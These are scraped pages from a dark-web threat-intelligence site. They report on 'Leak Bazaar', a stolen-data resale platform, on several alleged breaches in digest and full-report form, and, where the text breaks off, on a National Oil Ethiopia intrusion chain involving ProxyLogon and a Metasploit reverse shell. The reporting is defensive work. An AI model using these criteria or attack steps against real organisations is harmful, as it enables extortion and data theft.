journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-27 11:55:52 UTC Threat Actor BlackSnow (SnowTeam) Service Name Leak Bazaar Category Cybercrime Platform / Data Exchange Severity High Revenue Split 70% Seller / 30% Platform Target Revenue $10M+ Companies Min Data Volume 100 GB (Preferred 1 TB+) Escrow Exploit Guarantor Network Open Web ## Incident Overview A threat group called SnowTeam, posted by the actor BlackSnow, has announced the launch of Leak Bazaar, a closed corporate data exchange platform built to solve what they describe as the "refusenik" problem in ransomware: when a target's corporate network is compromised and terabytes of data are exfiltrated, but the victim refuses to pay the ransom, leaving the operator with data that's difficult to monetize through traditional data leak sites. Leak Bazaar positions itself as infrastructure that converts raw stolen data into structured, buyer-ready intelligence products. The platform's processing pipeline works in four stages: - **Automation and ML Filtering**: The server cluster hardware-filters system junk (OS backups, DLLs, ISO files) and performs deep NLP analysis of text arrays. A professional mathematician is responsible for the filtering algorithms' mathematical model. - **DBMS Reverse Engineering**: Server-side parsers automatically analyze raw database dumps from SQL, SAP, and Oracle exports, extracting financial transactions, payroll records, and contractor data into clean Excel/CSV exports. This feature is currently in beta. - **Cataloging**: Processed material is automatically categorized into high-margin segments: quarterly financial reports (QFR), M&A data, R&D (source code and development), and personal data. - **Manual Validation**: In-house analysts perform final manual review of all extracted data before it reaches the storefront, ensuring quality control. The platform also markets itself as a ransomware negotiation pressure tool, claiming that processed analytical reports can uncover "skeletons in the closet" such as evidence of working with OFAC/SDN sanctioned individuals, shadow accounting, and unissued financial reports, which can strengthen extortion leverage during negotiations. For buyers, the platform offers a differentiated purchasing model where you can buy only the specific data segment you need (R&D, financials, etc.) rather than an entire raw dump. Two purchase options are available: exclusive (full price, data removed after sale, seller gets 70%) or shared (half price, data remains available for resale, seller continues earning 70% on each subsequent sale). The platform accepts data from RaaS operators, initial access brokers, and independent pentesters, with unlimited seats for collaboration. Data submission requirements are strict: must be exclusive (unpublished), primarily English language, minimum 100GB volume (preferably 1TB+), from companies with revenue of $10M or above, and prioritizing technical development, biotechnology, chemistry, pharmaceuticals, law, insurance, and finance sectors. ## Target Industries & Data Types Technical Development / R&D Biotechnology Chemistry & Pharmaceuticals Law Firms Insurance Companies Financial Institutions Quarterly Financial Reports M&A Data Source Code & Documentation Payroll & HR Records Personal Data OFAC/SDN Sanctions Evidence ## Image Preview [![Forum post by BlackSnow announcing Leak Bazaar data exchange platform with ML-powered processing pipeline and server cluster architecture details](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/73278952398759273569782359870.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/73278952398759273569782359870.png) [![Leak Bazaar business model details including buyer options, revenue splits, data submission requirements, and target industry priorities](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/73278952398759273569782359871-2.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/73278952398759273569782359871-2.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1486 Data Encrypted for Impact The platform is designed to monetize data from failed ransomware negotiations where victims refuse to pay, creating a secondary market for encrypted and exfiltrated corporate data. ](https://attack.mitre.org/techniques/T1486/) [ T1567 Exfiltration Over Web Service Provides infrastructure for receiving, processing, and reselling exfiltrated corporate data through a structured marketplace with automated analysis and cataloging. ](https://attack.mitre.org/techniques/T1567/) [ T1213 Data from Information Repositories Automated DBMS reverse engineering parsers extract structured data from raw SQL, SAP, and Oracle database dumps, converting them into clean financial, payroll, and contractor records. ](https://attack.mitre.org/techniques/T1213/) [ T1560 Archive Collected Data Processes and catalogs raw data dumps (100GB to multi-TB) into segmented, buyer-ready categories including QFR, M&A, R&D, and personal data for targeted resale. ](https://attack.mitre.org/techniques/T1560/) [ T1657 Financial Theft Facilitates monetization of stolen corporate data through structured sales, with the platform taking a 30% commission and offering consulting to strengthen extortion negotiation leverage. ](https://attack.mitre.org/techniques/T1657/) [ T1588.006 Obtain Capabilities: Vulnerabilities Actively recruits RaaS operators, initial access brokers, and independent pentesters as data suppliers, building a supply chain for corporate breach data at scale. ](https://attack.mitre.org/techniques/T1588/006/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Daily Dose of Dark Web Informer - March 26th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-march-26th-2026/ Last updated: 2026-03-26T21:42:34.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **35,800+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 35.8k Unique Visitors 89.3k Pageviews Last 30 days as of Mar 2, 2026\. Next update Mar 31st. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) 💚 ## Support Dark Web Informer Contributions help continue monitoring threats and keeping the community informed. 🟠 MoneroXMR 89Z68A33B9sNRf941f5GczU4ZzarTQsWn6dyMVUbo6mk2zYEamh9hALH1odMiVZfynKhjKPS58ASAfDyFdTW9o29Mwf4ArZ Copied 🟡 BitcoinBTC bc1qvs4pfwascp2uln90g3e3l4agnhnjrdn2t578we Copied 🔷 EthereumETH / ERC-20 / USDT 0xbA6bCf2BF50F9789504401AFbf19E8c2CCaa773D Copied Click address to copy · ETH address accepts USDT, USDC, and other ERC-20 tokens ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence ❗️ [Alleged Data Leak of Rouzbeh Educational Complex Exposes 202,383 Records Including Student and Employee Social Security Numbers, Passwords, and National IDs](#) FREE 📰 [Dark Web Drug Ring Busted in Fulton County: Four Arrested in Rochester Investigation](#) FREE X/Twitter Updates ❗️ [The hacktivist group Handala Hack has followed through on their earlier threat, launching what they call a new phase of "Operation Lockheed Martin" via their Telegram channel and website.](https://x.com/DarkWebInformer/status/2037168721072914831?s=20) ❗️ [Interlock Ransomware has listed Goodwill Industries of North Central Pennsylvania (goodwillinc.org) on their leak site, publishing a full data dump of the nonprofit organization that provides employment across 15 counties in Pennsylvania and one county in New York.](https://x.com/DarkWebInformer/status/2037174856387564001?s=20) 💡 [New BreachForums clone.](https://x.com/DarkWebInformer/status/2037176692578337257?s=20) ❗️ [A post on a popular cybercrime forum is selling a massive data package from BMW Group, including internal documents, access vectors, and data from dozens of other automotive brands exposed through BMW's infrastructure.](https://x.com/DarkWebInformer/status/2037183676841119901?s=20) ❗️ [A post on a popular cybercrime forum is selling Spanish IBAN banking data containing 14 million records.](https://x.com/DarkWebInformer/status/2037184865213292774?s=20) 🔒 [X Subscribers Only](https://x.com/DarkWebInformer/status/2037186599738327329?s=20) ❗️ [A post on a popular cybercrime forum claims to be sharing U.S. Air Force Air Mobility Command operations logs related to Operation Lions Roar / Epic Fury 2026.](https://x.com/DarkWebInformer/status/2037189975393947893?s=20) 🔒 [X Subscribers Only](https://x.com/DarkWebInformer/status/2037191444423708919?s=20) 💡 [Spear forum, you have several IPs leaking, I would suggest changing them.](https://x.com/DarkWebInformer/status/2037200366190641558?s=20) ❗️ [Personal data of 447,445 members of the Fédération Française de Voile (French Sailing Federation) is allegedly being sold on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2037193357454082079?s=20) 🔒 [X Subscribers Only](https://x.com/DarkWebInformer/status/2037204899218211156?s=20) 💡 [A utility tool called "Logs Guru v1.4" is being advertised on a popular cybercrime forum, designed for processing and managing stolen credential logs at scale. Written in Rust, it claims to support terabyte-sized text files.](https://x.com/DarkWebInformer/status/2037211974757486843?s=20) ❗️ [Handala Hack, the hacktivist group behind the mass data Intune wipe of the company Stryker and the data leak of senior employees of Lockheed Martin, is now claiming a security breach of the FBI.](https://x.com/DarkWebInformer/status/2037215960864587885?s=20) ❗️ [A dataset allegedly containing 2.3 million unique user records from adiplix.com.br, a Brazilian debt collection management platform, is being sold on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2037234177998045299?s=20) ❗️ [Firewall access to an Asian oil company based in Laos with an estimated revenue of $7 million is claimed to be for sale on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2037245989090734306?s=20) ❗️ [Internal and confidential documents from Nu Bank via EmergiaCC Conalcreditos Colombia are allegedly being sold on a popular cybercrime forum, posted in collaboration with NyxarGroup.](https://x.com/DarkWebInformer/status/2037257272716615836?s=20) 🔒 [X Subscribers Only](https://x.com/DarkWebInformer/status/2037262401964241199?s=20) ❗️ [Threat actor hexvior is allegedly selling 1,000 USA personal identity records containing full names, emails, phone numbers, addresses, dates of birth, Social Security numbers, driver license information, and cashout amounts for $0.40 each.](https://x.com/DarkWebInformer/status/2037264828130001131?s=20) 💡 [When Hackers Get Fedded](https://x.com/DarkWebInformer/status/2037271266583888177?s=20) ❗️ [The database of Banco Agropecuario Peru has allegedly been leaked on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2037277696103686438?s=20) ❗️ [The database of ProCamps, a U.S.-based sports event management and marketing company specializing in professional athlete experiences, is allegedly being sold on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2037280533982699805?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### Dark Web Drug Ring Busted in Fulton County: Four Arrested in Rochester Investigation URL: https://darkwebinformer.com/dark-web-drug-ring-busted-in-fulton-county-four-arrested-in-rochester-investigation/ Last updated: 2026-03-26T17:45:38.000Z Four individuals were arrested in Fulton County, Indiana, following an investigation into dark web drug activity. The primary suspect, 18-year-old Tristin Shell of Rochester, is accused of purchasing large quantities of narcotics through the dark web and distributing them locally. He faces multiple charges, including dealing and possessing methamphetamine, dealing a controlled substance, and marijuana-related offenses. Three others were also arrested on related charges. April Lockridge (38) was charged with maintaining a common nuisance and possession of a controlled substance. Lynden Swanson (50) and Heather Shell (44) were each charged with maintaining a common nuisance. A search of a Rochester home turned up roughly 28 grams of suspected meth, prescription pills, suspected psilocybin mushrooms, marijuana, and drug paraphernalia. ### Alleged Data Leak of Rouzbeh Educational Complex Exposes 202,383 Records Including Student and Employee Social Security Numbers, Passwords, and National IDs URL: https://darkwebinformer.com/alleged-data-leak-of-rouzbeh-educational-complex-exposes-202-383-records-including-student-and-employee-social-security-numbers-passwords-and-national-ids/ Last updated: 2026-03-26T17:45:46.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Data Leak of Rouzbeh Educational Complex Exposes 202,383 Records Including Student and Employee Social Security Numbers, Passwords, and National IDs March 26, 2026 - 1:17:51 PM UTC Iran Education Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-26 13:17:51 UTC Threat Actor 0BITS Victim Rouzbeh Educational Complex Industry Education Category Data Leak Total Records 202,383 Data Date June 2023 Full Leak Size 1 GB (Compressed) Partial File 130 MB (69 MB Compressed) File Format CSV Price Free (Public Leak) Country Iran ## Incident Overview A threat actor going by 0BITS has uploaded a partial database leak from Rouzbeh Educational Complex, an Iranian education institution. The actor states the original breach dates back to June 2023 and exposed records belonging to both employees and students, totaling 202,383 records. The data has been published as a free download for registered forum members. The actor explicitly labeled this as a partial leak, providing both a partial file (130MB uncompressed, 69MB compressed) and referencing a full leak of 1GB compressed. The compromised data fields are extensive and include: - **Personal Identifiers**: Full names, email addresses, mobile numbers, home numbers, and family member details. - **Government IDs**: Social security numbers and national ID numbers, which are high-value identity theft targets in any country. - **Credentials**: Usernames and passwords. - **Identity Documents**: ID photos tied to individual records. - **Financial Data**: Invoices and transaction IDs. - **Institutional Data**: Birth dates, attendance records, location data, and status information. The combination of social security numbers, national IDs, passwords, and ID photos in a single dataset makes this particularly dangerous for identity fraud. Given this is an educational institution, a significant portion of the affected individuals are likely students, potentially including minors. The data is distributed in CSV format, making it easily parsed and exploitable. ## Compromised Data Categories Full Names Email Addresses Mobile Numbers Home Numbers Social Security Numbers National ID Numbers ID Photos Usernames & Passwords Family Member Details Invoices & Transaction IDs Birth Dates Attendance Records Location & Status Data ## Image Preview [![Forum post by 0BITS uploading partial database leak from Rouzbeh Educational Complex Iran with 202,383 records including SSNs, national IDs, passwords, and ID photos](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/83249560737901541773.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/83249560737901541773.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Targets vulnerabilities in the educational institution's web applications to gain unauthorized access to backend databases containing student and employee records. ](https://attack.mitre.org/techniques/T1190/) [ T1213 Data from Information Repositories Extracts structured records from the institution's database systems, pulling personal data, government IDs, credentials, financial records, and attendance data for over 202,000 individuals. ](https://attack.mitre.org/techniques/T1213/) [ T1555 Credentials from Password Stores Extracts usernames and passwords from the database, enabling direct account takeover and credential stuffing attacks against affected users across other platforms. ](https://attack.mitre.org/techniques/T1555/) [ T1589.001 Gather Victim Identity: Credentials Harvests social security numbers, national IDs, and ID photos that can be used for identity fraud, document forgery, and targeted impersonation attacks. ](https://attack.mitre.org/techniques/T1589/001/) [ T1567 Exfiltration Over Web Service Publishes the stolen database as a free download on web forums in CSV format, with the full leak gated behind forum registration and a partial file publicly accessible. ](https://attack.mitre.org/techniques/T1567/) [ T1560 Archive Collected Data Packages the stolen data into compressed archives (1GB full leak, 69MB partial) in CSV format for efficient distribution and download. ](https://attack.mitre.org/techniques/T1560/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Daily Dose of Dark Web Informer - March 25th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-march-25th-2026/ Last updated: 2026-03-25T21:47:25.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **35,800+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 35.8k Unique Visitors 89.3k Pageviews Last 30 days as of Mar 2, 2026\. Next update Mar 31st. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) 💚 ## Support Dark Web Informer Contributions help continue monitoring threats and keeping the community informed. 🟠 MoneroXMR 89Z68A33B9sNRf941f5GczU4ZzarTQsWn6dyMVUbo6mk2zYEamh9hALH1odMiVZfynKhjKPS58ASAfDyFdTW9o29Mwf4ArZ Copied 🟡 BitcoinBTC bc1qvs4pfwascp2uln90g3e3l4agnhnjrdn2t578we Copied 🔷 EthereumETH / ERC-20 / USDT 0xbA6bCf2BF50F9789504401AFbf19E8c2CCaa773D Copied Click address to copy · ETH address accepts USDT, USDC, and other ERC-20 tokens ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence ❗️ [Alleged Breach of Chile's Ley del Lobby Platform Exposes 250GB of Government Lobbying Records Spanning 2018 to 2026](https://darkwebinformer.com/alleged-breach-of-chiles-ley-del-lobby-platform-exposes-250gb-of-government-lobbying-records-spanning-2018-to-2026/) FREE ❗️ [Alleged Breach of Airsoft-Entrepot Exposes 333K Customer Records, Orders, Invoices, and B2B Data From French Retailer Spanning 2013 to 2026](https://darkwebinformer.com/alleged-breach-of-airsoft-entrepot-exposes-333k-customer-records-orders-invoices-and-b2b-data-from-french-retailer-spanning-2013-to-2026/) FREE ❗️ [Alleged Breach of Chile's Servicio Civil Platform Exposes 110K Public Servant Records With Full Names and User IDs](https://darkwebinformer.com/alleged-breach-of-chiles-servicio-civil-platform-exposes-110k-public-servant-records-with-full-names-and-user-ids/) FREE ❗️ [Alleged Breach of Allopneus Exposes 453K Customers and 739K Records From France's Leading Online Tire Retailer Spanning 2014 to 2026](https://darkwebinformer.com/alleged-breach-of-allopneus-exposes-453k-customers-and-739k-records-from-frances-leading-online-tire-retailer-spanning-2014-to-2026/) FREE ❗️ [Threat Actors Claim Expanded BMW Breach With IDOR Exploit, Employee and Customer PII, and Data From Mazda, Toyota, Audi, Ford, and 32 Additional Automakers](https://darkwebinformer.com/threat-actors-claim-expanded-bmw-breach-with-idor-exploit-employee-and-customer-pii-and-data-from-mazda-toyota-audi-ford-and-32-additional-automakers/) FREE 💡 [Physical Bitcoin Attacks: A Comprehensive Database of Known Physical Attacks Against Bitcoin and Crypto Asset Holders Occurring in Meatspace](https://darkwebinformer.com/physical-bitcoin-attacks-a-comprehensive-database-of-known-physical-attacks-against-bitcoin-and-crypto-asset-holders-occurring-in-meatspace/) FREE ❗️ [Alleged Full Infrastructure Compromise of National Oil Ethiopia With 800GB ERP Database Exfiltration, Veeam and Kaspersky Compromise, and Ransomware Deployment](https://darkwebinformer.com/alleged-full-infrastructure-compromise-of-national-oil-ethiopia-with-800gb-erp-database-exfiltration-veeam-and-kaspersky-compromise-and-ransomware-deployment/) FREE ❗️ [Alleged Breach of Alyna Exposes 18,000 Users With Passwords, GPS Coordinates, and Booking Data From Kuwaiti Laundry and Cleaning App](https://darkwebinformer.com/alleged-breach-of-alyna-exposes-18000-users-with-passwords-gps-coordinates-and-booking-data-from-kuwaiti-laundry-and-cleaning-app/) FREE X/Twitter Updates ❗️ [A post on a popular cybercrime forum is auctioning Colombian driver's license document packages containing identity documents and personal files.](https://x.com/DarkWebInformer/status/2036822762753323125?s=20) ❗️ [A post on a popular cybercrime forum is advertising United States/Canada Police Tipline Databases, originally sourced from P3Global / CrimeStoppers and dubbed "BlueLeaks 2.0".](https://x.com/DarkWebInformer/status/2036826487194554842?s=20) ❗️ [A post on a popular cybercrime forum is auctioning shell access to a Palestinian ISP/MSP that offers services including Data Centers, VPNs, VoIP, and FTTB.](https://x.com/DarkWebInformer/status/2036828250421285252?s=20) ❗️ [A post on a popular cybercrime forum is selling 600 Panamanian national ID (DNI) photos sourced from the government employment site empleospanama.gob.pa (MITRADEL - Ministerio de Trabajo y Desarrollo Laboral).](https://x.com/DarkWebInformer/status/2036833986048115197?s=20) 💡 [.@Cloudflare kicking people out for handing out drink protection kits is peak irony. You protect packets but not people? Your whole brand is literally shielding others from threats. Until it's at your own party, apparently. Make it make sense.](https://x.com/DarkWebInformer/status/2036839026838110250?s=20) ❗️ [A post on a popular cybercrime forum has leaked the database of fenixlogin.dyndns.tv.](https://x.com/DarkWebInformer/status/2036842358226968747?s=20) 💡 [Go feed the bottle baby some malware...](https://x.com/DarkWebInformer/status/2036846497606533340?s=20) ❗️ [A post on a popular cybercrime forum is advertising 430K+ dumped records and full proof-of-concept exploit chains targeting two unnamed hotel industry platforms. The data involves B2B corporate clients including property managers, agents, and channel partners of major OTAs.](https://x.com/DarkWebInformer/status/2036849623239717043?s=20) 💡 [\[.\]ac BF that didn't take long.](https://x.com/DarkWebInformer/status/2036851846417960973?s=20) ❗️ [Authorities in Russia have taken into custody a suspect believed to be the founder and operator of the LeakBase cybercrime forum. The arrest took place in the city of Taganrog.](https://x.com/DarkWebInformer/status/2036854571042038157?s=20) 💡 [What a nice guy @xpl0itrs](https://x.com/DarkWebInformer/status/2036857940666167535?s=20) ❗️ [Footage of the LeakBase domain administrator getting arrested in Taganrog, Russia.](https://x.com/DarkWebInformer/status/2036860377208676464?s=20) 💡 [CCITIC filed a successful abuse claim against BF.](https://x.com/DarkWebInformer/status/2036863356171174192?s=20) 💡 [I wondered what a prison in Taganrog, Russia looked like and holy would I not want to go there...](https://x.com/DarkWebInformer/status/2036866554608939298?s=20) ❗️ [The hacktivist group Handala Hack has posted a threatening message on their Telegram channel claiming an imminent data leak targeting Lockheed Martin, the major U.S. defense contractor.](https://x.com/DarkWebInformer/status/2036874767710478693?s=20) 🔒 [X Subscribers Only](https://x.com/DarkWebInformer/status/2036881174769832398?s=20) 🔒 [X Subscribers Only](https://x.com/DarkWebInformer/status/2036886350511608006?s=20) 🔒 [X Subscribers Only](https://x.com/DarkWebInformer/status/2036888744872013935?s=20) 💡 [CISA has added 1 vulnerability to the KEV Catalog.](https://x.com/DarkWebInformer/status/2036894064310685715?s=20) 💡 [New BreachForums domain registration.](https://x.com/DarkWebInformer/status/2036897255072928147?s=20) 💡 [The Teenagers Who Hacked Las Vegas](https://x.com/DarkWebInformer/status/2036898229246112001?s=20) ❗️ [A post on a popular cybercrime forum has leaked the full database of Altatech, a Brazilian technology company, available for free download.](https://x.com/DarkWebInformer/status/2036901812918509695?s=20) ❗️ [Esprinet has been claimed a victim to ALP-001 Ransomware.](https://x.com/DarkWebInformer/status/2036909014584324206?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### Alleged Breach of Alyna Exposes 18,000 Users With Passwords, GPS Coordinates, and Booking Data From Kuwaiti Laundry and Cleaning App URL: https://darkwebinformer.com/alleged-breach-of-alyna-exposes-18-000-users-with-passwords-gps-coordinates-and-booking-data-from-kuwaiti-laundry-and-cleaning-app/ Last updated: 2026-03-25T16:02:55.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Breach of Alyna Exposes 18,000 Users With Passwords, GPS Coordinates, and Booking Data From Kuwaiti Laundry and Cleaning App March 25, 2026 - 10:07:11 AM UTC Kuwait Services / Mobile App Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-25 10:07:11 UTC Threat Actor Sorb Victim Alyna Industry Services / Mobile App Category Data Breach Total Users 18,000 Unique Emails 13,500 Unique Phones 16,000 Password Hashing MD5 Price $300 Network Open Web Country Kuwait ## Incident Overview A threat actor going by Sorb claims to be selling the full user database from Alyna, a Kuwait-based mobile app that provides laundry and cleaning services. The company was founded in 2019 in Hawally, Kuwait, and operates as an unfunded app-based platform available on both Google Play and the Apple App Store. The database contains 18,000 total user records with the following data points: - **Account Data**: User IDs, account types, names (including Arabic names), gender, date of birth, email addresses, mobile numbers, profile images, registration dates, and email verification status. - **Credentials**: Passwords hashed with MD5, which is a weak and easily crackable hashing algorithm. The actor also mentions a combo list of email/phone hash pairs (13,500 mail hashes and 17,000 phone hashes). - **Location Data**: GPS coordinates (latitude and longitude), booking addresses, street addresses, and area information. This is particularly sensitive as it reveals where users live or regularly request services. - **Device and Platform Data**: Operating system type, device language, push registration IDs, and social media registration source. - **Service Data**: Preferred services, house type IDs, room counts, booking details, likes, guest status, and anonymization flags. - **Tokens**: Kfast tokens that may allow session hijacking or unauthorized account access. The listing is priced at $300 with escrow available, and the actor specifies this is a single-buyer exclusive sale ("sales in one hands"). The deduplicated counts show 13,500 unique emails and 16,000 unique phone numbers. Given the nature of the service, the GPS and booking address data effectively maps where users live across Kuwait, making this a physical safety concern beyond typical PII exposure. ## Compromised Data Categories Full Names (English & Arabic) Email Addresses Phone Numbers MD5 Hashed Passwords GPS Coordinates (Lat/Lon) Booking & Street Addresses Date of Birth Gender Device & OS Information Social Media Registration Service Preferences Kfast Tokens ## Image Preview [![Forum post by Sorb selling 18,000 user records from Alyna Kuwait laundry app with company description and app store links](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/33824268418131185249.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/33824268418131185249.png) [![Database field structure and record counts for Alyna breach showing CSV column headers including GPS coordinates, passwords, and booking data](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/33824268418131185250.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/33824268418131185250.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Targets vulnerabilities in the mobile app's backend API or web infrastructure to gain unauthorized access to the user database. ](https://attack.mitre.org/techniques/T1190/) [ T1555 Credentials from Password Stores Extracts MD5 hashed passwords from the database. MD5 is a weak algorithm that can be cracked rapidly, giving attackers access to plaintext credentials for account takeover. ](https://attack.mitre.org/techniques/T1555/) [ T1213 Data from Information Repositories Extracts structured user data from the app's backend database including personal profiles, service preferences, booking histories, and location records. ](https://attack.mitre.org/techniques/T1213/) [ T1589.002 Gather Victim Identity: Email Addresses Harvests 13,500 unique email addresses and 16,000 phone numbers along with associated personal details for resale or targeted attacks. ](https://attack.mitre.org/techniques/T1589/002/) [ T1528 Steal Application Access Token Extracts Kfast tokens and push registration IDs that could be used to hijack user sessions or send unauthorized push notifications to victims' devices. ](https://attack.mitre.org/techniques/T1528/) [ T1567 Exfiltration Over Web Service Advertises and sells the stolen database through web forums as an exclusive single-buyer deal with escrow service for $300. ](https://attack.mitre.org/techniques/T1567/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Alleged Full Infrastructure Compromise of National Oil Ethiopia With 800GB ERP Database Exfiltration, Veeam and Kaspersky Compromise, and Ransomware Deployment URL: https://darkwebinformer.com/alleged-full-infrastructure-compromise-of-national-oil-ethiopia-with-800gb-erp-database-exfiltration-veeam-and-kaspersky-compromise-and-ransomware-deployment/ Last updated: 2026-03-24T17:22:29.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Full Infrastructure Compromise of National Oil Ethiopia With 800GB ERP Database Exfiltration, Veeam and Kaspersky Compromise, and Ransomware Deployment March 24, 2026 - 1:54:50 PM UTC Ethiopia Oil & Gas / Government Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-24 13:54:50 UTC Threat Actor ByteToBreach Victim National Oil Ethiopia (NOC) Industry Oil & Gas / Government Category Ransomware / Data Breach Data Size 800+ GB (ERP: 500 GB) Databases 4 Initial Access Exchange ProxyLogon Severity Critical Ransomware Deployed Network Open Web Country Ethiopia ## Incident Overview A threat actor going by ByteToBreach claims to have fully compromised the infrastructure of National Oil Ethiopia PLC (NOC), Ethiopia's state-owned oil company. This is not a simple database dump. The actor describes a complete infrastructure takeover that progressed through 8 distinct steps, culminating in ransomware deployment. The listing includes a detailed technical narrative of the intrusion, which is unusual for forum posts and suggests the actor wants to demonstrate credibility and operational sophistication. The actor outlines the following attack chain: - **Step 1: Initial Foothold**: Gained entry through a basic Exchange ProxyLogon exploit. The actor notes there weren't many vulnerabilities to exploit beyond this entry point. - **Step 2: Pivot**: Moved laterally from the compromised Exchange server into the internal network. The actor used a Metasploit reverse shell and ran Ligolo as a background process on an internal host for tunneling, noting this 